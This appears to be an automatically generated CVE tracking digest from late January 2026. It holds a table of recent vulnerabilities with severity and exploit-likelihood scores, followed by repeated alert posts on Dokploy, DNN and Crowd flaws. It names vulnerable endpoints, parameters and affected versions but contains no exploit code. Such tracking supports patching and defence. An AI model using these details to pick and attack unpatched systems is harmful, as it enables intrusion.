##
Updated at UTC 2026-01-28T03:03:16.413615
| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-24841 | 9.9 | 0.00% | 2 | 0 | 2026-01-28T01:16:14.797000 | Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior | |
| CVE-2026-24840 | 8.0 | 0.00% | 2 | 0 | 2026-01-28T01:16:14.647000 | Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior | |
| CVE-2026-24838 | 9.1 | 0.00% | 4 | 0 | 2026-01-28T01:16:14.350000 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS | |
| CVE-2026-21569 | 7.9 | 0.00% | 4 | 0 | 2026-01-28T01:16:14.187000 | This High severity XXE (XML External Entity Injection) vulnerability was introdu | |
| CVE-2025-15467 | None | 0.00% | 14 | 0 | 2026-01-28T00:32:44 | Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AE | |
| CVE-2026-24837 | 7.6 | 0.00% | 2 | 0 | 2026-01-28T00:15:51.050000 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS | |
| CVE-2026-24836 | 7.6 | 0.00% | 2 | 0 | 2026-01-28T00:15:50.910000 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS | |
| CVE-2026-24833 | 7.6 | 0.00% | 2 | 0 | 2026-01-28T00:15:50.773000 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS | |
| CVE-2026-23830 | 10.0 | 0.00% | 2 | 0 | 2026-01-28T00:15:50.170000 | SandboxJS is a JavaScript sandboxing library. Versions prior to 0.8.26 have a sa | |
| CVE-2025-67645 | 8.8 | 0.00% | 2 | 0 | 2026-01-28T00:15:49.770000 | OpenEMR is a free and open source electronic health records and medical practice | |
| CVE-2025-55292 | 8.2 | 0.00% | 2 | 0 | 2026-01-28T00:15:49.607000 | Meshtastic is an open source mesh networking solution. In the current Meshtastic | |
| CVE-2026-24858 | 9.8 | 0.00% | 7 | 0 | 2026-01-27T22:15:58.067000 | An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-2 | |
| CVE-2026-24778 | 8.8 | 0.00% | 2 | 0 | 2026-01-27T22:15:57.097000 | Ghost is an open source content management system. In Ghost versions 5.43.0 thro | |
| CVE-2026-24765 | 7.8 | 0.00% | 4 | 0 | 2026-01-27T22:15:56.790000 | PHPUnit is a testing framework for PHP. A vulnerability has been discovered in v | |
| CVE-2025-59106 | 8.8 | 0.01% | 2 | 0 | 2026-01-27T21:32:51 | The binary serving the web server and executing basically all actions launched f | |
| CVE-2025-21589 | 9.8 | 0.00% | 4 | 0 | 2026-01-27T21:31:56 | An Authentication Bypass Using an Alternate Path or Channel vulnerability in Jun | |
| CVE-2026-24881 | 8.1 | 0.00% | 2 | 0 | 2026-01-27T21:31:49 | In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an | |
| CVE-2026-24747 | 8.8 | 0.00% | 2 | 0 | 2026-01-27T20:10:54 | ### Summary A vulnerability in PyTorch's `weights_only` unpickler allows an att | |
| CVE-2026-24882 | 8.4 | 0.00% | 2 | 0 | 2026-01-27T19:16:16.670000 | In GnuPG before 2.5.17, a stack-based buffer overflow exists in tpm2daemon durin | |
| CVE-2026-23760 | 9.8 | 51.37% | 3 | 1 | template | 2026-01-27T18:33:14 | SmarterTools SmarterMail versions prior to build 9511 contain an authentication |
| CVE-2025-33234 | 7.8 | 0.00% | 4 | 0 | 2026-01-27T18:32:29 | NVIDIA runx contains a vulnerability where an attacker could cause a code inject | |
| CVE-2026-23593 | 7.5 | 0.00% | 2 | 0 | 2026-01-27T18:32:29 | A vulnerability in the web-based management interface of HPE Aruba Networking Fa | |
| CVE-2026-24874 | 9.1 | 0.00% | 4 | 0 | 2026-01-27T18:32:28 | Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in t | |
| CVE-2026-24873 | 7.8 | 0.00% | 2 | 0 | 2026-01-27T18:32:28 | Out-of-bounds Read vulnerability in Rinnegatamante lpp-vita.This issue affects l | |
| CVE-2026-24832 | 9.8 | 0.00% | 2 | 0 | 2026-01-27T18:32:25 | Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affec | |
| CVE-2026-24831 | 7.5 | 0.00% | 4 | 0 | 2026-01-27T18:32:16 | Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-te | |
| CVE-2026-22260 | 7.5 | 0.00% | 2 | 0 | 2026-01-27T18:15:55.383000 | Suricata is a network IDS, IPS and NSM engine. Starting in version 8.0.0 and pri | |
| CVE-2026-23881 | 7.7 | 0.00% | 2 | 0 | 2026-01-27T18:02:23 | ## Summary Unbounded memory consumption in Kyverno's policy engine allows users | |
| CVE-2026-24869 | 8.1 | 0.00% | 2 | 0 | 2026-01-27T17:16:14.470000 | Use-after-free in the Layout: Scrolling and Overflow component. This vulnerabili | |
| CVE-2026-22039 | 9.9 | 0.00% | 2 | 0 | 2026-01-27T17:16:12.097000 | Kyverno is a policy engine designed for cloud native platform engineering teams. | |
| CVE-2026-21509 | 7.8 | 13.01% | 15 | 2 | 2026-01-27T16:19:42.330000 | Reliance on untrusted inputs in a security decision in Microsoft Office allows a | |
| CVE-2026-24875 | 7.8 | 0.00% | 2 | 0 | 2026-01-27T16:16:37.013000 | Integer Overflow or Wraparound vulnerability in yoyofr modizer.This issue affect | |
| CVE-2026-24872 | 9.8 | 0.00% | 2 | 0 | 2026-01-27T16:16:36.640000 | improper pointer arithmetic vulnerability in ProjectSkyfire SkyFire_548.This i | |
| CVE-2025-68670 | 9.1 | 0.00% | 2 | 0 | 2026-01-27T16:16:16.037000 | xrdp is an open source RDP server. xrdp before v0.10.5 contains an unauthenticat | |
| CVE-2026-1470 | 10.0 | 0.00% | 1 | 1 | 2026-01-27T15:30:38 | n8n contains a critical Remote Code Execution (RCE) vulnerability in its workflo | |
| CVE-2026-21720 | 7.5 | 0.04% | 1 | 1 | 2026-01-27T15:30:30 | Every uncached /avatar/:hash request spawns a goroutine that refreshes the Grava | |
| CVE-2025-52691 | 10.0 | 79.25% | 3 | 1 | template | 2026-01-27T15:28:07.247000 | Successful exploitation of the vulnerability could allow an unauthenticated atta |
| CVE-2025-41727 | 7.8 | 0.02% | 1 | 0 | 2026-01-27T14:59:34.073000 | A local low privileged attacker can bypass the authentication of the Device Mana | |
| CVE-2026-24828 | 7.5 | 0.04% | 1 | 0 | 2026-01-27T14:59:34.073000 | Missing Release of Memory after Effective Lifetime vulnerability in Is-Daouda is | |
| CVE-2026-24830 | 9.8 | 0.04% | 1 | 1 | 2026-01-27T14:59:34.073000 | Integer Overflow or Wraparound vulnerability in Ralim IronOS.This issue affects | |
| CVE-2026-21721 | 8.1 | 0.03% | 1 | 1 | 2026-01-27T14:59:34.073000 | The dashboard permissions API does not verify the target dashboard scope and onl | |
| CVE-2026-24470 | 8.1 | 0.02% | 1 | 1 | 2026-01-27T14:59:34.073000 | Skipper is an HTTP router and reverse proxy for service composition. Prior to ve | |
| CVE-2025-14459 | 8.5 | 0.01% | 1 | 1 | 2026-01-27T14:59:34.073000 | A flaw was found in KubeVirt Containerized Data Importer (CDI). This vulnerabili | |
| CVE-2025-41726 | 8.8 | 0.18% | 1 | 0 | 2026-01-27T12:31:24 | A low privileged remote attacker can execute arbitrary code by sending specially | |
| CVE-2026-24827 | 7.5 | 0.04% | 1 | 1 | 2026-01-27T12:31:24 | Out-of-bounds Write vulnerability in gerstrong Commander-Genius.This issue affec | |
| CVE-2025-13601 | 7.7 | 0.03% | 1 | 0 | 2026-01-27T10:15:48.420000 | A heap-based buffer overflow problem was found in glib through an incorrect calc | |
| CVE-2026-1361 | 7.8 | 0.01% | 1 | 1 | 2026-01-27T06:30:18 | ASDA-Soft Stack-based Buffer Overflow Vulnerability | |
| CVE-2026-24523 | 7.5 | 0.03% | 2 | 1 | 2026-01-27T00:32:17 | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulne | |
| CVE-2026-24536 | 7.5 | 0.03% | 1 | 0 | 2026-01-27T00:31:13 | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulne | |
| CVE-2026-24531 | 9.8 | 0.11% | 1 | 1 | 2026-01-27T00:31:13 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP | |
| CVE-2026-24656 | 3.7 | 0.03% | 1 | 0 | 2026-01-26T23:43:30 | Deserialization of Untrusted Data vulnerability in Apache Karaf Decanter. The D | |
| CVE-2025-27821 | 7.3 | 0.04% | 1 | 0 | 2026-01-26T23:40:20 | Out-of-bounds Write vulnerability in Apache Hadoop HDFS native client. This iss | |
| CVE-2026-24490 | 8.1 | 0.01% | 1 | 1 | 2026-01-26T23:36:20 | ### Summary A Stored Cross-site Scripting (XSS) vulnerability in MobSF's Android | |
| CVE-2026-24486 | 8.6 | 0.02% | 2 | 1 | 2026-01-26T23:28:06 | ### Summary A Path Traversal vulnerability exists when using non-default config | |
| CVE-2026-24534 | 8.8 | 0.04% | 1 | 1 | 2026-01-26T23:16:10.440000 | Missing Authorization vulnerability in uPress Booter booter-bots-crawlers-manage | |
| CVE-2026-24532 | 8.8 | 0.04% | 1 | 1 | 2026-01-26T23:16:10.283000 | Missing Authorization vulnerability in SiteLock SiteLock Security sitelock allow | |
| CVE-2026-24524 | 8.1 | 0.03% | 2 | 0 | 2026-01-26T23:16:09.643000 | Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploi | |
| CVE-2026-22582 | 9.8 | 0.02% | 2 | 1 | 2026-01-26T21:31:38 | Improper Neutralization of Argument Delimiters in a Command ('Argument Injection | |
| CVE-2026-22585 | 9.8 | 0.01% | 2 | 0 | 2026-01-26T21:31:38 | Use of a Broken or Risky Cryptographic Algorithm vulnerability in Salesforce Mar | |
| CVE-2026-24538 | 7.6 | 0.11% | 2 | 1 | 2026-01-26T21:30:35 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP | |
| CVE-2026-24061 | 9.8 | 34.45% | 13 | 38 | template | 2026-01-26T21:30:32 | telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a " |
| CVE-2018-14634 | 7.8 | 18.00% | 3 | 1 | 2026-01-26T21:30:29 | An integer overflow flaw was found in the Linux kernel's create_elf_tables() fun | |
| CVE-2026-21962 | 10.0 | 0.04% | 2 | 1 | 2026-01-26T21:15:56.233000 | Vulnerability in the Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in pr | |
| CVE-2026-22586 | 9.8 | 0.01% | 2 | 0 | 2026-01-26T19:16:23.930000 | Hard-coded Cryptographic Key vulnerability in Salesforce Marketing Cloud Engagem | |
| CVE-2026-22709 | 9.8 | 0.06% | 5 | 0 | 2026-01-26T18:57:15 | In vm2 for version 3.10.0, `Promise.prototype.then` `Promise.prototype.catch` ca | |
| CVE-2026-22696 | None | 0.02% | 1 | 1 | 2026-01-26T18:55:14 | ## Impact This vulnerability involves a critical gap in the cryptographic verifi | |
| CVE-2026-22583 | 9.8 | 0.02% | 1 | 0 | 2026-01-26T18:32:34 | Improper Neutralization of Argument Delimiters in a Command ('Argument Injection | |
| CVE-2025-52024 | 9.4 | 0.03% | 1 | 0 | 2026-01-26T18:32:32 | A vulnerability exists in the Aptsys POS Platform Web Services module thru 2025- | |
| CVE-2025-13952 | 9.8 | 0.01% | 1 | 0 | 2026-01-26T18:32:32 | A web page that contains unusual GPU shader code is loaded from the Internet int | |
| CVE-2025-70982 | 10.0 | 0.04% | 1 | 0 | 2026-01-26T18:31:31 | Incorrect access control in the importUser function of SpringBlade v4.5.0 allows | |
| CVE-2025-67274 | 7.5 | 0.04% | 1 | 0 | 2026-01-26T18:31:31 | An issue in continuous.software aangine v.2025.2 allows a remote attacker to obt | |
| CVE-2025-52026 | 7.5 | 0.01% | 1 | 0 | 2026-01-26T17:16:11.030000 | An information disclosure vulnerability exists in the /srvs/membersrv/getCashier | |
| CVE-2025-52025 | 9.4 | 0.01% | 1 | 0 | 2026-01-26T17:16:10.867000 | An SQL Injection vulnerability exists in the GetServiceByRestaurantID endpoint o | |
| CVE-2025-67264 | 7.8 | 0.05% | 1 | 0 | 2026-01-26T16:15:59.017000 | An OS command injection vulnerability in the com.sprd.engineermode component in | |
| CVE-2026-1283 | 7.8 | 0.01% | 1 | 0 | 2026-01-26T15:31:29 | A Heap-based Buffer Overflow vulnerability affecting the EPRT file reading proce | |
| CVE-2025-67968 | 0 | 0.02% | 1 | 0 | 2026-01-26T15:04:33.567000 | Unrestricted Upload of File with Dangerous Type vulnerability in InspiryThemes R | |
| CVE-2026-24367 | 8.8 | 0.03% | 1 | 0 | 2026-01-26T15:04:14.850000 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti | |
| CVE-2025-66428 | 8.8 | 0.02% | 1 | 0 | 2026-01-26T15:04:14.850000 | An issue with WordPress directory names in WebPros WordPress Toolkit before 6.9. | |
| CVE-2026-20736 | 7.5 | 0.03% | 1 | 0 | 2026-01-26T15:04:14.850000 | Gitea does not properly verify repository context when deleting attachments. A u | |
| CVE-2026-20897 | 9.1 | 0.03% | 1 | 0 | 2026-01-26T15:04:14.850000 | Gitea does not properly validate repository ownership when deleting Git LFS lock | |
| CVE-2026-21264 | 9.3 | 0.07% | 1 | 0 | 2026-01-26T15:04:14.850000 | Improper neutralization of input during web page generation ('cross-site scripti | |
| CVE-2026-24609 | 7.5 | 0.11% | 1 | 0 | 2026-01-26T15:03:51.687000 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP | |
| CVE-2025-69908 | 7.5 | 0.01% | 1 | 0 | 2026-01-26T15:03:51.687000 | An unauthenticated information disclosure vulnerability in Newgen OmniApp allows | |
| CVE-2026-0710 | 8.4 | 0.05% | 1 | 0 | 2026-01-26T15:03:51.687000 | A flaw was found in SIPp. A remote attacker could exploit this by sending specia | |
| CVE-2025-14866 | 8.8 | 0.01% | 1 | 0 | 2026-01-26T15:03:51.687000 | The Melapress Role Editor plugin for WordPress is vulnerable to Privilege Escala | |
| CVE-2025-4320 | 10.0 | 0.07% | 1 | 0 | 2026-01-26T15:03:51.687000 | Authentication Bypass by Primary Weakness, Weak Password Recovery Mechanism for | |
| CVE-2025-15063 | 9.8 | 1.00% | 1 | 0 | 2026-01-26T15:03:51.687000 | Ollama MCP Server execAsync Command Injection Remote Code Execution Vulnerabilit | |
| CVE-2025-15062 | 7.8 | 0.05% | 1 | 0 | 2026-01-26T15:03:51.687000 | Trimble SketchUp SKP File Parsing Use-After-Free Remote Code Execution Vulnerabi | |
| CVE-2026-0762 | 8.1 | 0.36% | 1 | 0 | 2026-01-26T15:03:51.687000 | GPT Academic stream_daas Deserialization of Untrusted Data Remote Code Execution | |
| CVE-2026-1284 | 7.8 | 0.01% | 1 | 0 | 2026-01-26T15:03:33.357000 | An Out-Of-Bounds Write vulnerability affecting the EPRT file reading procedure i | |
| CVE-2025-13374 | 9.8 | 0.14% | 1 | 1 | 2026-01-26T15:03:33.357000 | The Kalrav AI Agent plugin for WordPress is vulnerable to arbitrary file uploads | |
| CVE-2026-1257 | 7.5 | 0.07% | 1 | 0 | 2026-01-26T15:03:33.357000 | The Administrative Shortcodes plugin for WordPress is vulnerable to Local File I | |
| CVE-2026-24412 | 8.8 | 0.06% | 1 | 0 | 2026-01-26T15:03:33.357000 | iccDEV provides libraries and tools for interacting with, manipulating, and appl | |
| CVE-2026-1386 | 6.0 | 0.01% | 1 | 0 | 2026-01-26T15:03:33.357000 | A UNIX symbolic link following issue in the jailer component in Firecracker vers | |
| CVE-2025-70986 | 7.5 | 0.01% | 1 | 0 | 2026-01-26T15:03:33.357000 | Incorrect access control in the selectDept function of RuoYi v4.8.2 allows unaut | |
| CVE-2026-1428 | 8.8 | 0.29% | 1 | 0 | 2026-01-26T09:30:24 | Single Sign-On Portal System developed by WellChoose has a OS Command Injection | |
| CVE-2026-1427 | 8.8 | 0.09% | 1 | 0 | 2026-01-26T09:30:24 | Single Sign-On Portal System developed by WellChoose has a OS Command Injection | |
| CVE-2026-1420 | 8.8 | 0.09% | 1 | 0 | 2026-01-26T06:30:34 | A flaw has been found in Tenda AC23 16.03.07.52. This impacts an unknown functio | |
| CVE-2026-0911 | 7.5 | 0.07% | 1 | 0 | 2026-01-24T15:30:21 | The Hustle β Email Marketing, Lead Generation, Optins, Popups plugin for WordPre | |
| CVE-2025-69180 | 8.8 | 0.03% | 1 | 0 | 2026-01-23T22:36:54 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti | |
| CVE-2026-24608 | 7.5 | 0.11% | 1 | 0 | 2026-01-23T22:36:54 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP | |
| CVE-2026-24635 | 7.5 | 0.11% | 1 | 0 | 2026-01-23T22:36:54 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP | |
| CVE-2025-69907 | 7.5 | 0.03% | 1 | 0 | 2026-01-23T22:35:52 | An unauthenticated information disclosure vulnerability exists in Newgen OmniDoc | |
| CVE-2025-56005 | 9.8 | 0.36% | 1 | 1 | 2026-01-23T22:35:51 | An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 all | |
| CVE-2025-66720 | 7.5 | 0.01% | 1 | 0 | 2026-01-23T21:31:51 | Null pointer dereference in free5gc pcf 1.4.0 in file internal/sbi/processor/amp | |
| CVE-2025-67229 | 9.8 | 0.01% | 1 | 0 | 2026-01-23T21:31:51 | An improper certificate validation vulnerability exists in ToDesktop Builder v0. | |
| CVE-2025-66719 | 9.1 | 0.03% | 1 | 0 | 2026-01-23T21:31:50 | An issue was discovered in Free5gc NRF 1.4.0. In the access-token generation log | |
| CVE-2024-37079 | 9.8 | 79.02% | 7 | 0 | 2026-01-23T21:31:35 | vCenter Server contains a heap-overflow vulnerability in the implementation of t | |
| CVE-2025-70983 | 10.0 | 0.01% | 1 | 0 | 2026-01-23T21:30:54 | Incorrect access control in the authRoutes function of SpringBlade v4.5.0 allows | |
| CVE-2025-70985 | 9.1 | 0.01% | 1 | 0 | 2026-01-23T21:30:44 | Incorrect access control in the update function of RuoYi v4.8.2 allows unauthori | |
| CVE-2025-56590 | 9.8 | 0.05% | 1 | 0 | 2026-01-23T21:30:43 | An issue was discovered in the InsertFromURL() function of the Apryse HTML2PDF S | |
| CVE-2026-24572 | 8.8 | 0.01% | 1 | 0 | 2026-01-23T21:30:43 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti | |
| CVE-2025-34026 | 7.5 | 47.46% | 1 | 0 | template | 2026-01-23T21:30:35 | The Versa Concerto SD-WAN orchestration platform is vulnerable to an authenticat |
| CVE-2026-20912 | None | 0.03% | 1 | 0 | 2026-01-23T20:14:54 | Gitea does not properly validate repository ownership when linking attachments t | |
| CVE-2026-20750 | None | 0.03% | 1 | 0 | 2026-01-23T20:14:36 | Gitea does not properly validate project ownership in organization project opera | |
| CVE-2025-11344 | 6.3 | 0.19% | 1 | 0 | 2026-01-23T19:15:51.993000 | A vulnerability was detected in ILIAS up to 8.23/9.13/10.1. Affected by this vul | |
| CVE-2025-68645 | 8.8 | 26.23% | 1 | 3 | template | 2026-01-23T18:39:33.290000 | A Local File Inclusion (LFI) vulnerability exists in the Webmail Classic UI of Z |
| CVE-2026-24423 | None | 0.09% | 2 | 0 | 2026-01-23T18:31:37 | SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated | |
| CVE-2024-9932 | 9.8 | 81.47% | 2 | 3 | 2026-01-23T18:31:22 | The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads | |
| CVE-2025-4319 | 9.4 | 0.07% | 1 | 0 | 2026-01-23T15:31:44 | Improper Restriction of Excessive Authentication Attempts, Weak Password Recover | |
| CVE-2025-15351 | 7.8 | 0.21% | 1 | 0 | 2026-01-23T06:31:32 | Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Cod | |
| CVE-2025-15349 | 7.5 | 0.09% | 1 | 0 | 2026-01-23T06:31:32 | Anritsu ShockLine SCPI Race Condition Remote Code Execution Vulnerability. This | |
| CVE-2025-15059 | 7.8 | 0.06% | 1 | 0 | 2026-01-23T06:31:26 | GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerabi | |
| CVE-2025-15061 | 9.8 | 0.85% | 1 | 0 | 2026-01-23T06:31:24 | Framelink Figma MCP Server fetchWithRetry Command Injection Remote Code Executio | |
| CVE-2025-15350 | 7.8 | 0.21% | 1 | 0 | 2026-01-23T06:31:24 | Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Cod | |
| CVE-2025-15348 | 7.8 | 0.21% | 1 | 0 | 2026-01-23T06:31:23 | Anritsu ShockLine CHX File Parsing Deserialization of Untrusted Data Remote Code | |
| CVE-2026-1201 | None | 0.04% | 1 | 0 | 2026-01-23T00:31:24 | An Authorization Bypass Through User-Controlled Key vulnerability in Hubitat Ele | |
| CVE-2026-24305 | 9.3 | 0.07% | 1 | 0 | 2026-01-23T00:31:24 | Azure Entra ID Elevation of Privilege Vulnerability | |
| CVE-2026-24306 | 9.8 | 0.09% | 1 | 1 | 2026-01-23T00:31:24 | Improper access control in Azure Front Door (AFD) allows an unauthorized attacke | |
| CVE-2025-54816 | 9.4 | 0.07% | 1 | 0 | 2026-01-23T00:31:17 | This vulnerability occurs when a WebSocket endpoint does not enforce proper aut | |
| CVE-2026-20613 | None | 0.01% | 1 | 0 | 2026-01-22T22:30:06 | ### Summary The `ArchiveReader.extractContents()` function used by `cctl image l | |
| CVE-2025-54313 | 7.5 | 4.17% | 1 | 3 | 2026-01-22T21:52:57 | eslint-config-prettier 8.10.1, 9.1.1, 10.1.6, and 10.1.7 has embedded malicious | |
| CVE-2025-31125 | 5.3 | 65.97% | 1 | 7 | template | 2026-01-22T21:47:41 | ### Summary The contents of arbitrary files can be returned to the browser. ## |
| CVE-2026-0920 | 9.8 | 0.03% | 1 | 2 | 2026-01-22T09:31:48 | The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Ad | |
| CVE-2026-22755 | None | 0.96% | 1 | 0 | 2026-01-20T21:31:34 | Improper Neutralization of Special Elements used in a Command ('Command Injectio | |
| CVE-2026-20965 | 7.6 | 0.03% | 1 | 0 | 2026-01-13T18:31:18 | Improper verification of cryptographic signature in Windows Admin Center allows | |
| CVE-2025-55182 | 10.0 | 57.94% | 1 | 100 | template | 2025-12-09T16:53:25 | ### Impact There is an unauthenticated remote code execution vulnerability in R |
| CVE-2025-12480 | 9.1 | 75.25% | 1 | 0 | template | 2025-11-14T02:00:02.350000 | Triofox versions prior to 16.7.10368.56560, are vulnerable to an Improper Access |
| CVE-2025-12556 | 8.8 | 0.11% | 2 | 0 | 2025-11-06T18:32:50 | An argument injection vulnerability exists in the affected product that could al | |
| CVE-2025-41244 | 7.8 | 0.92% | 1 | 3 | 2025-11-06T13:58:13.620000 | VMware Aria Operations and VMware Tools contain a local privilege escalation vul | |
| CVE-2023-26819 | 2.9 | 0.04% | 1 | 0 | 2025-11-03T20:16:00.937000 | cJSON 1.7.15 might allow a denial of service via a crafted JSON document such as | |
| CVE-2025-34164 | None | 0.30% | 2 | 1 | 2025-11-03T18:32:42 | A heap-based buffer overflow vulnerability in NetSupport ManagerΒ 14.x versions p | |
| CVE-2025-8088 | 8.8 | 2.94% | 7 | 27 | 2025-10-22T00:34:26 | A path traversal vulnerability affecting the Windows version of WinRAR allows th | |
| CVE-2021-35394 | 9.8 | 94.22% | 1 | 0 | template | 2025-10-22T00:33:23 | Realtek Jungle SDK version v2.x up to v3.4.14B provides a diagnostic tool called |
| CVE-2019-17621 | 9.8 | 93.30% | 1 | 2 | 2025-10-22T00:31:50 | The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06 | |
| CVE-2025-34165 | None | 0.25% | 2 | 1 | 2025-08-30T00:30:35 | A stack-based buffer overflow vulnerability in NetSupport ManagerΒ 14.x versions | |
| CVE-2024-37081 | 7.8 | 49.73% | 1 | 4 | 2025-06-20T19:08:08.187000 | The vCenter Server contains multiple local privilege escalation vulnerabilities | |
| CVE-2007-0882 | None | 90.96% | 1 | 0 | 2025-04-09T03:38:26 | Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 | |
| CVE-2025-2294 | 9.8 | 54.35% | 2 | 9 | template | 2025-03-28T06:30:37 | The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclu |
| CVE-2024-37080 | 9.8 | 36.73% | 1 | 0 | 2025-03-13T15:33:36 | vCenter Server contains a heap-overflow vulnerability in the implementation of t | |
| CVE-2020-15250 | 4.4 | 0.02% | 1 | 0 | 2024-11-21T05:05:11.403000 | In JUnit4 from version 4.7 and before 4.13.1, the test rule TemporaryFolder cont | |
| CVE-2026-24770 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-24741 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-24783 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-24736 | 0 | 0.00% | 4 | 0 | N/A | ||
| CVE-2026-22794 | 0 | 0.03% | 2 | 1 | N/A | ||
| CVE-2026-22259 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-22258 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-0648 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-24002 | 0 | 0.05% | 2 | 0 | N/A | ||
| CVE-2026-23864 | 0 | 0.60% | 2 | 1 | N/A | ||
| CVE-2025-48384 | 0 | 0.33% | 2 | 44 | N/A | ||
| CVE-2026-24469 | 0 | 0.03% | 1 | 0 | N/A | ||
| CVE-2026-24399 | 0 | 0.01% | 2 | 0 | N/A | ||
| CVE-2026-24406 | 0 | 0.06% | 2 | 0 | N/A | ||
| CVE-2026-24405 | 0 | 0.06% | 1 | 0 | N/A |
updated 2026-01-28T01:16:14.797000
2 posts
π΄ CVE-2026-24841 - Critical (9.9)
Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameter...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24841/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24841 - Critical (9.9)
Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameter...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24841/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T01:16:14.647000
2 posts
π CVE-2026-24840 - High (8)
Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a hardcoded credential in the provided installation script (located at https://dokploy.com/install.sh, line 154) uses a hardcoded password when creating th...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24840/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24840 - High (8)
Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a hardcoded credential in the provided installation script (located at https://dokploy.com/install.sh, line 154) uses a hardcoded password when creating th...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24840/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T01:16:14.350000
4 posts
π΄ CVE-2026-24838 - Critical (9.1)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24838/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24838 - Critical (9.1)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24838/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24838 - Critical (9.1)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24838/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24838 - Critical (9.1)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24838/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T01:16:14.187000
4 posts
π CVE-2026-21569 - High (7.9)
This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server.
This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated att...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21569/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21569 - High (7.9)
This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server.
This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated att...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21569/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21569 - High (7.9)
This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server.
